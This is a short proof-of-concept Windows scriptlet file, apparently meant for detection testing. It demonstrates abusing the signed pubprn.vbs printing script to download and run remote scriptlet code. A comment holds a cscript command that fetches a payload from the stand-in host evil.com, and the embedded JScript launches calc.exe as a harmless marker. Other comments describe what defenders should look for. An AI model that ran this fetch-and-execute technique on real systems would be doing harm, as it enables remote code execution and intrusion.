<?XML version="1.0"?><scriptlet><registration progid="PoC" classi

1. <?XML version="1.0"?>
2. <scriptlet>
3. <registration
4. progid="PoC"
5. classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
6. <!-- cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:http://evil.com/payload.sct" -->
7.  
8. <!-- .sct files when downloaded, are executed from a path like this -->
9. <!-- Please Note, file extenstion does not matter -->
10. <!-- Though, the name and extension are arbitary.. -->
11. <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
12. <!-- Based on current research, no registry keys are written, since call "uninstall" -->
13. <!-- You can either execute locally, or from a url -->
14. <script language="JScript">
15. <![CDATA[
16. // calc.exe should launch, this could be any arbitrary code.
17. // What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
18. var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
19.  
20. ]]>
21. </script>
22. </registration>
23. </scriptlet>